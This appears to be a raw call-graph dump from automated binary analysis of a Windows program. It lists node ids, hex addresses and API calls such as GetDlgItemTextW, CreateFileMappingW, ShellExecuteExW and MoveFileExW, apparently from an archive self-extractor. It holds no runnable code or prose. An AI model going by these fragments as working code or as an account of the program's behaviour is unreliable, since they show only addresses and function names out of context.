23717 4eecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23714->23717 23715->23714 23719 4f7430 _unexpected 23718->23719 23720 4f7448 23719->23720 23721 4f757e _abort GetModuleHandleW 23719->23721 23740 4fa3f1 EnterCriticalSection 23720->23740 23723 4f743c 23721->23723 23723->23720 23752 4f75c2 GetModuleHandleExW 23723->23752 23724 4f74ee 23741 4f752e 23724->23741 23728 4f74c5 23731 4f74dd 23728->23731 23735 4f81f1 _abort 5 API calls 23728->23735 23729 4f750b 23744 4f753d 23729->23744 23730 4f7537 23761 501a19 5 API calls _ValidateLocalCookies 23730->23761 23736 4f81f1 _abort 5 API calls 23731->23736 23735->23731 23736->23724 23737 4f7450 23737->23724 23737->23728 23760 4f7f30 20 API calls _abort 23737->23760 23740->23737 23762 4fa441 LeaveCriticalSection 23741->23762 23743 4f7507 23743->23729 23743->23730 23763 4fa836 23744->23763 23747 4f756b 23749 4f75c2 _abort 8 API calls 23747->23749 23748 4f754b GetPEB 23748->23747 23750 4f755b GetCurrentProcess TerminateProcess 23748->23750 23751 4f7573 ExitProcess 23749->23751 23750->23747 23753 4f760f 23752->23753 23754 4f75ec GetProcAddress 23752->23754 23755 4f761e 23753->23755 23756 4f7615 FreeLibrary 23753->23756 23757 4f7601 23754->23757 23758 4eec4a _ValidateLocalCookies 5 API calls 23755->23758 23756->23755 23757->23753 23759 4f7628 23758->23759 23759->23720 23760->23728 23762->23743 23764 4fa85b 23763->23764 23768 4fa851 23763->23768 23765 4fa458 _unexpected 5 API calls 23764->23765 23765->23768 23766 4eec4a _ValidateLocalCookies 5 API calls 23767 4f7547 23766->23767 23767->23747 23767->23748 23768->23766 24782 4eacd0 100 API calls 24834 4e19d0 26 API calls std::bad_exception::bad_exception 23776 4eaee0 23777 4eaeea __EH_prolog 23776->23777 23939 4d130b 23777->23939 23780 4eaf2c 23784 4eaf39 23780->23784 23785 4eafa2 23780->23785 23841 4eaf18 23780->23841 23781 4eb5cb 24004 4ecd2e 23781->24004 23789 4eaf3e 23784->23789 23790 4eaf75 23784->23790 23788 4eb041 GetDlgItemTextW 23785->23788 23794 4eafbc 23785->23794 23786 4eb5e9 SendMessageW 23787 4eb5f7 23786->23787 23792 4eb600 SendDlgItemMessageW 23787->23792 23793 4eb611 GetDlgItem SendMessageW 23787->23793 23788->23790 23791 4eb077 23788->23791 23795 4dddd1 53 API calls 23789->23795 23789->23841 23796 4eaf96 KiUserCallbackDispatcher 23790->23796 23790->23841 23797 4eb08f GetDlgItem 23791->23797 23937 4eb080 23791->23937 23792->23793 24022 4e9da4 GetCurrentDirectoryW 23793->24022 23799 4dddd1 53 API calls 23794->23799 23800 4eaf58 23795->23800 23796->23841 23802 4eb0a4 SendMessageW SendMessageW 23797->23802 23803 4eb0c5 SetFocus 23797->23803 23804 4eafde SetDlgItemTextW 23799->23804 24044 4d1241 SHGetMalloc 23800->24044 23801 4eb641 GetDlgItem 23806 4eb65e 23801->23806 23807 4eb664 SetWindowTextW 23801->23807 23802->23803 23808 4eb0d5 23803->23808 23822 4eb0ed 23803->23822 23809 4eafec 23804->23809 23806->23807 24023 4ea2c7 GetClassNameW 23807->24023 23813 4dddd1 53 API calls 23808->23813 23814 4eaff9 GetMessageW 23809->23814 23809->23841 23810 4eaf5f 23816 4eaf63 SetDlgItemTextW 23810->23816 23810->23841 23811 4eb56b 23817 4dddd1 53 API calls 23811->23817 23815 4eb0df 23813->23815 23820 4eb010 IsDialogMessageW 23814->23820 23814->23841 24045 4ecb5a 23815->24045 23816->23841 23823 4eb57b SetDlgItemTextW 23817->23823 23820->23809 23825 4eb01f TranslateMessage DispatchMessageW 23820->23825 23827 4dddd1 53 API calls 23822->23827 23826 4eb58f 23823->23826 23825->23809 23830 4dddd1 53 API calls 23826->23830 23829 4eb124 23827->23829 23828 4eb6af 23833 4eb6df 23828->23833 23838 4dddd1 53 API calls 23828->23838 23834 4d400a _swprintf 51 API calls 23829->23834 23835 4eb5b8 23830->23835 23832 4ebdf5 98 API calls 23832->23828 23847 4ebdf5 98 API calls 23833->23847 23867 4eb797 23833->23867 23839 4eb136 23834->23839 23840 4dddd1 53 API calls 23835->23840 23836 4eb0e6 23949 4da04f 23836->23949 23845 4eb6c2 SetDlgItemTextW 23838->23845 23846 4ecb5a 16 API calls 23839->23846 23840->23841 23842 4eb847 23848 4eb859 23842->23848 23849 4eb850 EnableWindow 23842->23849 23843 4eb17f 23955 4ea322 SetCurrentDirectoryW 23843->23955 23844 4eb174 GetLastError 23844->23843 23851 4dddd1 53 API calls 23845->23851 23846->23836 23852 4eb6fa 23847->23852 23853 4eb876 23848->23853 24063 4d12c8 GetDlgItem EnableWindow 23848->24063 23849->23848 23855 4eb6d6 SetDlgItemTextW 23851->23855 23856 4eb70c 23852->23856 23876 4eb731 23852->23876 23861 4eb89d 23853->23861 23869 4eb895 SendMessageW 23853->23869 23854 4eb195 23859 4eb19e GetLastError 23854->23859 23860 4eb1ac 23854->23860 23855->23833 24061 4e9635 32 API calls 23856->24061 23857 4eb78a 23862 4ebdf5 98 API calls 23857->23862 23859->23860 23873 4eb237 23860->23873 23874 4eb1c4 GetTickCount 23860->23874 23915 4eb227 23860->23915 23861->23841 23865 4dddd1 53 API calls 23861->23865 23862->23867 23864 4eb86c 24064 4d12c8 GetDlgItem EnableWindow 23864->24064 23871 4eb8b6 SetDlgItemTextW 23865->23871 23866 4eb725 23866->23876 23867->23842 23870 4eb825 23867->23870 23883 4dddd1 53 API calls 23867->23883 23869->23861 24062 4e9635 32 API calls 23870->24062 23871->23841 23872 4eb46c 23964 4d12e6 GetDlgItem ShowWindow 23872->23964 23878 4eb24f GetModuleFileNameW 23873->23878 23879 4eb407 23873->23879 23880 4d400a _swprintf 51 API calls 23874->23880 23876->23857 23884 4ebdf5 98 API calls 23876->23884 24055 4deb3a 80 API calls 23878->24055 23879->23790 23887 4dddd1 53 API calls 23879->23887 23881 4eb1dd 23880->23881 23956 4d971e 23881->23956 23882 4eb844 23882->23842 23883->23867 23888 4eb75f 23884->23888 23885 4eb47c 23965 4d12e6 GetDlgItem ShowWindow 23885->23965 23892 4eb41b 23887->23892 23888->23857 23893 4eb768 DialogBoxParamW 23888->23893 23890 4eb275 23891 4d400a _swprintf 51 API calls 23890->23891 23896 4eb297 CreateFileMappingW 23891->23896 23897 4d400a _swprintf 51 API calls 23892->23897 23893->23790 23893->23857 23894 4eb486 23895 4dddd1 53 API calls 23894->23895 23899 4eb490 SetDlgItemTextW 23895->23899 23900 4eb2f9 GetCommandLineW 23896->23900 23933 4eb376 __vswprintf_c_l 23896->23933 23901 4eb439 23897->23901 23966 4d12e6 GetDlgItem ShowWindow 23899->23966 23905 4eb30a 23900->23905 23914 4dddd1 53 API calls 23901->23914 23902 4eb203 23906 4eb20a GetLastError 23902->23906 23907 4eb215 23902->23907 23903 4eb381 ShellExecuteExW 23928 4eb39e 23903->23928 24056 4eab2e SHGetMalloc 23905->24056 23906->23907 23910 4d9653 79 API calls 23907->23910 23908 4eb4a2 SetDlgItemTextW GetDlgItem 23911 4eb4bf GetWindowLongW SetWindowLongW 23908->23911 23912 4eb4d7 23908->23912 23910->23915 23911->23912 23967 4ebdf5 23912->23967 23913 4eb326 24057 4eab2e SHGetMalloc 23913->24057 23914->23790 23915->23872 23915->23873 23919 4eb332 24058 4eab2e SHGetMalloc 23919->24058 23920 4eb3e1 23920->23879 23927 4eb3f7 UnmapViewOfFile CloseHandle 23920->23927 23921 4ebdf5 98 API calls 23923 4eb4f3 23921->23923 23992 4ed0f5 23923->23992 23924 4eb33e 24059 4decad 80 API calls ___scrt_fastfail 23924->24059 23927->23879 23928->23920 23931 4eb3cd Sleep 23928->23931 23930 4eb355 MapViewOfFile 23930->23933 23931->23920 23931->23928 23932 4ebdf5 98 API calls 23936 4eb519 23932->23936 23933->23903 23934 4eb542 24060 4d12c8 GetDlgItem EnableWindow 23934->24060 23936->23934 23938 4ebdf5 98 API calls 23936->23938 23937->23790 23937->23811 23938->23934 23940 4d136d 23939->23940 23941 4d1314 23939->23941 24066 4dda71 GetWindowLongW SetWindowLongW 23940->24066 23942 4d137a 23941->23942 24065 4dda98 62 API calls 2 library calls 23941->24065 23942->23780 23942->23781 23942->23841 23945 4d1336 23945->23942 23946 4d1349 GetDlgItem 23945->23946 23946->23942 23947 4d1359 23946->23947 23947->23942 23948 4d135f SetWindowTextW 23947->23948 23948->23942 23951 4da059 23949->23951 23950 4da0ea 23952 4da207 9 API calls 23950->23952 23954 4da113 23950->23954 23951->23950 23951->23954 24067 4da207 23951->24067 23952->23954 23954->23843 23954->23844 23955->23854 23957 4d9728 23956->23957 23958 4d9792 CreateFileW 23957->23958 23959 4d9786 23957->23959 23958->23959 23960 4db66c 2 API calls 23959->23960 23961 4d97e4 23959->23961 23962 4d97cb 23960->23962 23961->23902 23962->23961 23963 4d97cf CreateFileW 23962->23963 23963->23961 23964->23885 23965->23894 23966->23908 23968 4ebdff __EH_prolog 23967->23968 23969 4eb4e5 23968->23969 24099 4eaa36 23968->24099 23969->23921 23972 4eaa36 ExpandEnvironmentStringsW 23981 4ebe36 _wcsrchr 23972->23981 23973 4ec11d SetWindowTextW 23973->23981 23978 4ebf0b SetFileAttributesW 23979 4ebfc5 GetFileAttributesW 23978->23979 23991 4ebf25 ___scrt_fastfail 23978->23991 23979->23981 23982 4ebfd7 DeleteFileW 23979->23982 23981->23969 23981->23972 23981->23973 23981->23978 23984 4ec2e7 GetDlgItem SetWindowTextW SendMessageW 23981->23984 23987 4ec327 SendMessageW 23981->23987 24103 4e17ac CompareStringW 23981->24103 24104 4e9da4 GetCurrentDirectoryW 23981->24104 24106 4da52a 7 API calls 23981->24106 24107 4da4b3 FindClose 23981->24107 24108 4eab9a 76 API calls ___std_exception_copy 23981->24108 24109 4f35de 23981->24109 23982->23981 23985 4ebfe8 23982->23985 23984->23981 23986 4d400a _swprintf 51 API calls 23985->23986 23988 4ec008 GetFileAttributesW 23986->23988 23987->23981 23988->23985 23989 4ec01d MoveFileW 23988->23989 23989->23981 23990 4ec035 MoveFileExW 23989->23990 23990->23981 23991->23979 23991->23981 24105 4db4f7 52 API calls 2 library calls 23991->24105 23993 4ed0ff __EH_prolog 23992->23993 24124 4dfead 23993->24124 23995 4ed130 24128 4d5c59 23995->24128 23997 4ed14e 24132 4d7c68 23997->24132 24001 4ed1a1 24149 4d7cfb 24001->24149 24003 4eb504 24003->23932 24005 4ecd38 24004->24005 24006 4e9d1a 4 API calls 24005->24006 24007 4ecd3d 24006->24007 24008 4ecd45 GetWindow 24007->24008 24009 4eb5d1 24007->24009 24008->24009 24012 4ecd65 24008->24012 24009->23786 24009->23787 24010 4ecd72 GetClassNameW 24593 4e17ac CompareStringW 24010->24593 24012->24009 24012->24010 24013 4ecdfa GetWindow 24012->24013 24014 4ecd96 GetWindowLongW 24012->24014 24013->24009 24013->24012 24014->24013 24015 4ecda6 SendMessageW 24014->24015 24015->24013 24016 4ecdbc GetObjectW 24015->24016 24594 4e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24016->24594 24018 4ecdd3 24595 4e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24018->24595 24596 4e9f5d 8 API calls ___scrt_fastfail 24018->24596 24021 4ecde4 SendMessageW DeleteObject 24021->24013 24022->23801 24024 4ea2e8 24023->24024 24030 4ea30d 24023->24030 24597 4e17ac CompareStringW 24024->24597 24026 4ea31b 24031 4ea7c3 24026->24031 24027 4ea312 SHAutoComplete 24027->24026 24028 4ea2fb 24029 4ea2ff FindWindowExW 24028->24029 24028->24030 24029->24030 24030->24026 24030->24027 24032 4ea7cd __EH_prolog 24031->24032 24033 4d1380 82 API calls 24032->24033 24034 4ea7ef 24033->24034 24598 4d1f4f 24034->24598 24037 4ea818 24040 4d1951 126 API calls 24037->24040 24038 4ea809 24039 4d1631 84 API calls 24038->24039 24041 4ea814 24039->24041 24043 4ea83a __vswprintf_c_l ___std_exception_copy 24040->24043 24041->23828 24041->23832 24042 4d1631 84 API calls 24042->24041 24043->24041 24043->24042 24044->23810 24606 4eac74 PeekMessageW 24045->24606 24048 4ecbbc SendMessageW SendMessageW 24050 4ecbf8 24048->24050 24051 4ecc17 SendMessageW SendMessageW SendMessageW 24048->24051 24049 4ecb88 24052 4ecb93 ShowWindow SendMessageW SendMessageW 24049->24052 24050->24051 24053 4ecc6d SendMessageW 24051->24053 24054 4ecc4a SendMessageW 24051->24054 24052->24048 24053->23836 24054->24053 24055->23890 24056->23913 24057->23919 24058->23924 24059->23930 24060->23937 24061->23866 24062->23882 24063->23864 24064->23853 24065->23945 24066->23942 24068 4da214 24067->24068 24069 4da238 24068->24069 24070 4da22b CreateDirectoryW 24068->24070 24088 4da180 24069->24088 24070->24069 24072 4da26b 24070->24072 24076 4da27a 24072->24076 24080 4da444 24072->24080 24074 4da27e GetLastError 24074->24076 24076->23951 24077 4db66c 2 API calls 24078 4da254 24077->24078 24078->24074 24079 4da258 CreateDirectoryW 24078->24079 24079->24072 24079->24074 24081 4ee360 24080->24081 24082 4da451 SetFileAttributesW 24081->24082 24083 4da494 24082->24083 24084 4da467 24082->24084 24083->24076 24085 4db66c 2 API calls 24084->24085 24086 4da47b 24085->24086 24086->24083 24087 4da47f SetFileAttributesW 24086->24087 24087->24083 24091 4da194 24088->24091 24092 4ee360 24091->24092 24093 4da1a1 GetFileAttributesW 24092->24093 24094 4da189 24093->24094 24095 4da1b2 24093->24095 24094->24074 24094->24077 24096 4db66c 2 API calls 24095->24096 24097 4da1c6 24096->24097 24097->24094 24098 4da1ca GetFileAttributesW 24097->24098 24098->24094 24101 4eaa40 24099->24101 24100 4eab16 24100->23981 24101->24100 24102 4eaaf3 ExpandEnvironmentStringsW 24101->24102 24102->24100 24103->23981 24104->23981 24105->23991 24106->23981 24107->23981 24108->23981 24110 4f8606 24109->24110 24111 4f861e 24110->24111 24112 4f8613 24110->24112 24114 4f8626 24111->24114 24120 4f862f _unexpected 24111->24120 24113 4f8518 __onexit 21 API calls 24112->24113 24118 4f861b 24113->24118 24115 4f84de _free 20 API calls 24114->24115 24115->24118 24116 4f8659 HeapReAlloc 24116->24118 24116->24120 24117 4f8634 24122 4f895a 20 API calls _free 24117->24122 24118->23981 24120->24116 24120->24117 24123 4f71ad 7 API calls 2 library calls 24120->24123 24122->24118 24123->24120 24125 4dfeba 24124->24125 24153 4d1789 24125->24153 24127 4dfed2 24127->23995 24129 4dfead 24128->24129 24130 4d1789 76 API calls 24129->24130 24131 4dfed2 24130->24131 24131->23997 24133 4d7c72 __EH_prolog 24132->24133 24170 4dc827 24133->24170 24135 4d7c8d 24136 4ee24a new 8 API calls 24135->24136 24137 4d7cb7 24136->24137 24176 4e440b 24137->24176 24140 4d7ddf 24141 4d7de9 24140->24141 24142 4d7e53 24141->24142 24205 4da4c6 24141->24205 24146 4d7ec4 24142->24146 24148 4da4c6 8 API calls 24142->24148 24183 4d837f 24142->24183 24144 4d7f06 24144->24001 24146->24144 24211 4d6dc1 74 API calls 24146->24211 24148->24142 24150 4d7d09 24149->24150 24152 4d7d10 24149->24152 24151 4e1acf 84 API calls 24150->24151 24151->24152 24154 4d179f 24153->24154 24165 4d17fa __vswprintf_c_l 24153->24165 24155 4d17c8 24154->24155 24166 4d6e91 74 API calls __vswprintf_c_l 24154->24166 24157 4d1827 24155->24157 24162 4d17e7 ___std_exception_copy 24155->24162 24159 4f35de 22 API calls 24157->24159 24158 4d17be 24167 4d6efd 75 API calls 24158->24167 24161 4d182e 24159->24161 24161->24165 24169 4d6efd 75 API calls 24161->24169 24162->24165 24168 4d6efd 75 API calls 24162->24168 24165->24127 24166->24158 24167->24155 24168->24165 24169->24165 24171 4dc831 __EH_prolog 24170->24171 24172 4ee24a new 8 API calls 24171->24172 24173 4dc874 24172->24173 24174 4ee24a new 8 API calls 24173->24174 24175 4dc898 24174->24175 24175->24135 24177 4e4415 __EH_prolog 24176->24177 24178 4ee24a new 8 API calls 24177->24178 24179 4e4431 24178->24179 24180 4d7ce6 24179->24180 24182 4e06ba 78 API calls 24179->24182 24180->24140 24182->24180 24184 4d8389 __EH_prolog 24183->24184 24212 4d1380 24184->24212 24186 4d83a4 24220 4d9ef7 24186->24220 24192 4d83d3 24343 4d1631 24192->24343 24193 4d846e 24239 4d8517 24193->24239 24196 4d84ce 24246 4d1f00 24196->24246 24200 4d83cf 24200->24192 24200->24193 24203 4da4c6 8 API calls 24200->24203 24347 4dbac4 CompareStringW 24200->24347 24201 4d84d9 24201->24192 24250 4d3aac 24201->24250 24260 4d857b 24201->24260 24203->24200 24206 4da4db 24205->24206 24210 4da4df 24206->24210 24581 4da5f4 24206->24581 24208 4da4ef 24209 4da4f4 FindClose 24208->24209 24208->24210 24209->24210 24210->24141 24211->24144 24213 4d1385 __EH_prolog 24212->24213 24214 4dc827 8 API calls 24213->24214 24215 4d13bd 24214->24215 24216 4ee24a new 8 API calls 24215->24216 24219 4d1416 ___scrt_fastfail 24215->24219 24217 4d1403 24216->24217 24218 4db07d 82 API calls 24217->24218 24217->24219 24218->24219 24219->24186 24221 4d9f0e 24220->24221 24222 4d83ba 24221->24222 24348 4d6f5d 76 API calls 24221->24348 24222->24192 24224 4d19a6 24222->24224 24225 4d19b0 __EH_prolog 24224->24225 24235 4d1a00 24225->24235 24238 4d19e5 24225->24238 24349 4d709d 24225->24349 24227 4d1b50 24352 4d6dc1 74 API calls 24227->24352 24229 4d3aac 97 API calls 24232 4d1bb3 24229->24232 24230 4d1b60 24230->24229 24230->24238 24231 4d1bff 24237 4d1c32 24231->24237 24231->24238 24353 4d6dc1 74 API calls 24231->24353 24232->24231 24234 4d3aac 97 API calls 24232->24234 24234->24232 24235->24227 24235->24230 24235->24238 24236 4d3aac 97 API calls 24236->24237 24237->24236 24237->24238 24238->24200 24240 4d8524 24239->24240 24371 4e0c26 GetSystemTime SystemTimeToFileTime 24240->24371 24242 4d8488 24242->24196 24243 4e1359 24242->24243 24373 4ed51a 24243->24373 24247 4d1f05 __EH_prolog 24246->24247 24248 4d1f39 24247->24248 24381 4d1951 24247->24381 24248->24201 24251 4d3abc 24250->24251 24252 4d3ab8 24250->24252 24253 4d3af7 24251->24253 24255 4d3ae9 24251->24255 24252->24201 24516 4d27e8 97 API calls 3 library calls 24253->24516 24254 4d3b29 24254->24201 24255->24254 24515 4d3281 85 API calls 3 library calls 24255->24515 24258 4d3af5 24258->24254 24517 4d204e 74 API calls 24258->24517 24261 4d8585 __EH_prolog 24260->24261 24262 4d85be 24261->24262 24270 4d85c2 24261->24270 24539 4e84bd 99 API calls 24261->24539 24263 4d85e7 24262->24263 24268 4d867a 24262->24268 24262->24270 24265 4d8609 24263->24265 24263->24270 24540 4d7b66 151 API calls 24263->24540 24265->24270 24541 4e84bd 99 API calls 24265->24541 24268->24270 24518 4d5e3a 24268->24518 24270->24201 24271 4d8705 24271->24270 24524 4d826a 24271->24524 24274 4d8875 24275 4da4c6 8 API calls 24274->24275 24277 4d88e0 24274->24277 24275->24277 24276 4dc991 80 API calls 24282 4d893b _memcmp 24276->24282 24528 4d7d6c 24277->24528 24279 4d8a70 24280 4d8b43 24279->24280 24286 4d8abf 24279->24286 24285 4d8b9e 24280->24285 24295 4d8b4e 24280->24295 24281 4d8a69 24544 4d1f94 74 API calls 24281->24544 24282->24270 24282->24276 24282->24279 24282->24281 24542 4d8236 82 API calls 24282->24542 24543 4d1f94 74 API calls 24282->24543 24294 4d8b30 24285->24294 24547 4d80ea 96 API calls 24285->24547 24288 4da180 4 API calls 24286->24288 24286->24294 24287 4d8b9c 24289 4d9653 79 API calls 24287->24289 24292 4d8af7 24288->24292 24289->24270 24291 4d9653 79 API calls 24291->24270 24292->24294 24545 4d9377 96 API calls 24292->24545 24293 4d8c09 24297 4d9989 GetFileType 24293->24297 24306 4d8c74 24293->24306 24342 4d91c1 __except_handler4 24293->24342 24294->24287 24294->24293 24295->24287 24546 4d7f26 100 API calls __except_handler4 24295->24546 24296 4daa88 8 API calls 24299 4d8cc3 24296->24299 24301 4d8c4c 24297->24301 24302 4daa88 8 API calls 24299->24302 24301->24306 24548 4d1f94 74 API calls 24301->24548 24315 4d8cd9 24302->24315 24304 4d8c62 24549 4d7061 75 API calls 24304->24549 24306->24296 24307 4d8d9c 24308 4d8efd 24307->24308 24309 4d8df7 24307->24309 24313 4d8f0f 24308->24313 24314 4d8f23 24308->24314 24330 4d8e27 24308->24330 24310 4d8e69 24309->24310 24312 4d8e07 24309->24312 24311 4d826a CharUpperW 24310->24311 24316 4d8e84 24311->24316 24317 4d8e4d 24312->24317 24323 4d8e15 24312->24323 24318 4d92e6 121 API calls 24313->24318 24319 4e2c42 75 API calls 24314->24319 24315->24307 24550 4d9b21 SetFilePointer GetLastError SetEndOfFile 24315->24550 24325 4d8ead 24316->24325 24326 4d8eb4 24316->24326 24316->24330 24317->24330 24552 4d7907 108 API calls 24317->24552 24318->24330 24321 4d8f3c 24319->24321 24555 4e28f1 121 API calls 24321->24555 24551 4d1f94 74 API calls 24323->24551 24553 4d7698 84 API calls __except_handler4 24325->24553 24554 4d9224 94 API calls __EH_prolog 24326->24554 24335 4d904b 24330->24335 24556 4d1f94 74 API calls 24330->24556 24332 4d9156 24334 4da444 4 API calls 24332->24334 24332->24342 24333 4d9104 24534 4d9d62 24333->24534 24336 4d91b1 24334->24336 24335->24332 24335->24333 24335->24342 24557 4d9ebf SetEndOfFile 24335->24557 24336->24342 24558 4d1f94 74 API calls 24336->24558 24339 4d914b 24341 4d96d0 75 API calls 24339->24341 24341->24332 24342->24291 24344 4d1643 24343->24344 24573 4dc8ca 24344->24573 24347->24200 24348->24222 24354 4d16d2 24349->24354 24351 4d70b9 24351->24235 24352->24238 24353->24237 24355 4d16e8 24354->24355 24366 4d1740 __vswprintf_c_l 24354->24366 24356 4d1711 24355->24356 24367 4d6e91 74 API calls __vswprintf_c_l 24355->24367 24357 4d1767 24356->24357 24363 4d172d ___std_exception_copy 24356->24363 24360 4f35de 22 API calls 24357->24360 24359 4d1707 24368 4d6efd 75 API calls 24359->24368 24361 4d176e 24360->24361 24361->24366 24370 4d6efd 75 API calls 24361->24370 24363->24366 24369 4d6efd 75 API calls 24363->24369 24366->24351 24367->24359 24368->24356 24369->24366 24370->24366 24372 4e0c56 __vsnwprintf_l 24371->24372 24372->24242 24374 4ed527 24373->24374 24375 4dddd1 53 API calls 24374->24375 24376 4ed54a 24375->24376 24377 4d400a _swprintf 51 API calls 24376->24377 24378 4ed55c 24377->24378 24379 4ecb5a 16 API calls 24378->24379 24380 4e1372 24379->24380 24380->24196 24382 4d195d 24381->24382 24383 4d1961 24381->24383 24382->24248 24385 4d1896 24383->24385 24386 4d18a8 24385->24386 24387 4d18e5 24385->24387 24388 4d3aac 97 API calls 24386->24388 24393 4d3f18 24387->24393 24391 4d18c8 24388->24391 24391->24382 24397 4d3f21 24393->24397 24394 4d3aac 97 API calls 24394->24397 24395 4d1906 24395->24391 24398 4d1e00 24395->24398 24397->24394 24397->24395 24410 4e067c 24397->24410 24399 4d1e0a __EH_prolog 24398->24399 24418 4d3b3d 24399->24418 24401 4d1e34 24402 4d1ebb 24401->24402 24403 4d16d2 76 API calls 24401->24403 24402->24391 24404 4d1e4b 24403->24404 24446 4d1849 76 API calls 24404->24446 24406 4d1e63 24408 4d1e6f 24406->24408 24447 4e137a MultiByteToWideChar 24406->24447 24448 4d1849 76 API calls 24408->24448 24411 4e0683 24410->24411 24414 4e069e 24411->24414 24416 4d6e8c RaiseException __CxxThrowException@8 24411->24416 24413 4e06af SetThreadExecutionState 24413->24397 24414->24413 24417 4d6e8c RaiseException __CxxThrowException@8 24414->24417 24416->24414 24417->24413 24419 4d3b47 __EH_prolog 24418->24419 24420 4d3b5d 24419->24420 24421 4d3b79 24419->24421 24477 4d6dc1 74 API calls 24420->24477 24423 4d3dc2 24421->24423 24426 4d3ba5 24421->24426 24494 4d6dc1 74 API calls 24423->24494 24425 4d3b68 24425->24401 24426->24425 24449 4e2c42 24426->24449 24428 4d3c26 24429 4d3cb1 24428->24429 24445 4d3c1d 24428->24445 24480 4dc991 24428->24480 24462 4daa88 24429->24462 24430 4d3c22 24430->24428 24479 4d2034 76 API calls 24430->24479 24432 4d3bf4 24432->24428 24432->24430 24433 4d3c12 24432->24433 24478 4d6dc1 74 API calls 24433->24478 24436 4d3cc4 24439 4d3d3e 24436->24439 24440 4d3d48 24436->24440 24466 4d92e6 24439->24466 24486 4e28f1 121 API calls 24440->24486 24443 4d3d46 24443->24445 24487 4d1f94 74 API calls 24443->24487 24488 4e1acf 24445->24488 24446->24406 24447->24408 24448->24402 24450 4e2c51 24449->24450 24452 4e2c5b 24449->24452 24495 4d6efd 75 API calls 24450->24495 24453 4e2ca2 ___std_exception_copy 24452->24453 24456 4e2c9d Concurrency::cancel_current_task 24452->24456 24461 4e2cfd ___scrt_fastfail 24452->24461 24454 4e2da9 Concurrency::cancel_current_task 24453->24454 24455 4e2cd9 24453->24455 24453->24461 24498 4f157a RaiseException 24454->24498 24496 4e2b7b 75 API calls 4 library calls 24455->24496 24497 4f157a RaiseException 24456->24497 24460 4e2dc1 24461->24432 24463 4daa95 24462->24463 24465 4daa9f 24462->24465 24464 4ee24a new 8 API calls 24463->24464 24464->24465 24465->24436 24467 4d92f0 __EH_prolog 24466->24467 24499 4d7dc6 24467->24499 24470 4d709d 76 API calls 24471 4d9302 24470->24471 24502 4dca6c 24471->24502 24473 4d935c 24473->24443 24475 4dca6c 114 API calls 24476 4d9314 24475->24476 24476->24473 24476->24475 24511 4dcc51 97 API calls __vswprintf_c_l 24476->24511 24477->24425 24478->24445 24479->24428 24481 4dc9c4 24480->24481 24482 4dc9b2 24480->24482 24513 4d6249 80 API calls 24481->24513 24512 4d6249 80 API calls 24482->24512 24485 4dc9bc 24485->24429 24486->24443 24487->24445 24489 4e1ad9 24488->24489 24490 4e1af2 24489->24490 24493 4e1b06 24489->24493 24514 4e075b 84 API calls 24490->24514 24492 4e1af9 24492->24493 24494->24425 24495->24452 24496->24461 24497->24454 24498->24460 24500 4dacf5 GetVersionExW 24499->24500 24501 4d7dcb 24500->24501 24501->24470 24508 4dca82 __vswprintf_c_l 24502->24508 24503 4dcbf7 24504 4dcc1f 24503->24504 24505 4dca0b 6 API calls 24503->24505 24506 4e067c SetThreadExecutionState RaiseException 24504->24506 24505->24504 24509 4dcbee 24506->24509 24507 4e84bd 99 API calls 24507->24508 24508->24503 24508->24507 24508->24509 24510 4dab70 89 API calls 24508->24510 24509->24476 24510->24508 24511->24476 24512->24485 24513->24485 24514->24492 24515->24258 24516->24258 24517->24254 24519 4d5e4a 24518->24519 24559 4d5d67 24519->24559 24522 4d5e7d 24523 4d5eb5 24522->24523 24564 4dad65 CharUpperW CompareStringW 24522->24564 24523->24271 24525 4d8289 24524->24525 24570 4e179d CharUpperW 24525->24570 24527 4d8333 24527->24274 24530 4d7d7b 24528->24530 24529 4d7dbb 24529->24282 24530->24529 24571 4d7043 74 API calls 24530->24571 24532 4d7db3 24572 4d6dc1 74 API calls 24532->24572 24535 4d9d73 24534->24535 24538 4d9d82 24534->24538 24536 4d9d79 FlushFileBuffers 24535->24536 24535->24538 24536->24538 24537 4d9dfb SetFileTime 24537->24339 24538->24537 24539->24262 24540->24265 24541->24270 24542->24282 24543->24282 24544->24279 24545->24294 24546->24287 24547->24294 24548->24304 24549->24306 24550->24307 24551->24330 24552->24330 24553->24330 24554->24330 24555->24330 24556->24335 24557->24333 24558->24342 24565 4d5c64 24559->24565 24561 4d5d88 24561->24522 24563 4d5c64 2 API calls 24563->24561 24564->24522 24568 4d5c6e 24565->24568 24566 4d5d56 24566->24561 24566->24563 24568->24566 24569 4dad65 CharUpperW CompareStringW 24568->24569 24569->24568 24570->24527 24571->24532 24572->24529 24574 4dc8db 24573->24574 24579 4da90e 84 API calls 24574->24579 24576 4dc90d 24580 4da90e 84 API calls 24576->24580 24578 4dc918 24579->24576 24580->24578 24582 4da5fe 24581->24582 24583 4da691 FindNextFileW 24582->24583 24584 4da621 FindFirstFileW 24582->24584 24586 4da69c GetLastError 24583->24586 24587 4da6b0 24583->24587 24585 4da638 24584->24585 24592 4da675 24584->24592 24588 4db66c 2 API calls 24585->24588 24586->24587 24587->24592 24589 4da64d 24588->24589 24590 4da66a GetLastError 24589->24590 24591 4da651 FindFirstFileW 24589->24591 24590->24592 24591->24590 24591->24592 24592->24208 24593->24012 24594->24018 24595->24018 24596->24021 24597->24028 24599 4d9ef7 76 API calls 24598->24599 24600 4d1f5b 24599->24600 24601 4d19a6 97 API calls 24600->24601 24604 4d1f78 24600->24604 24602 4d1f68 24601->24602 24602->24604 24605 4d6dc1 74 API calls 24602->24605 24604->24037 24604->24038 24605->24604 24607 4eac8f GetMessageW 24606->24607 24608 4eacc8 GetDlgItem 24606->24608 24609 4eacb4 TranslateMessage DispatchMessageW 24607->24609 24610 4eaca5 IsDialogMessageW 24607->24610 24608->24048 24608->24049 24609->24608 24610->24608 24610->24609 24783 4eb8e0 93 API calls _swprintf 24784 4e8ce0 6 API calls 24788 5016e0 CloseHandle 24836 4fabfd 6 API calls _ValidateLocalCookies 24615 4ee1f9 24616 4ee203 24615->24616 24617 4edf59 ___delayLoadHelper2@8 19 API calls 24616->24617 24618 4ee210 24617->24618 24837 4eebf7 20 API calls 24790 4fac0e 27 API calls _ValidateLocalCookies 24695 4d1385 82 API calls 3 library calls 24841 4f5780 QueryPerformanceFrequency QueryPerformanceCounter 24792 4ea89d 78 API calls 24793 4dea98 FreeLibrary 24842 4f2397 48 API calls 24704 4ed997 24706 4ed89b 24704->24706 24705 4edf59 ___delayLoadHelper2@8 19 API calls 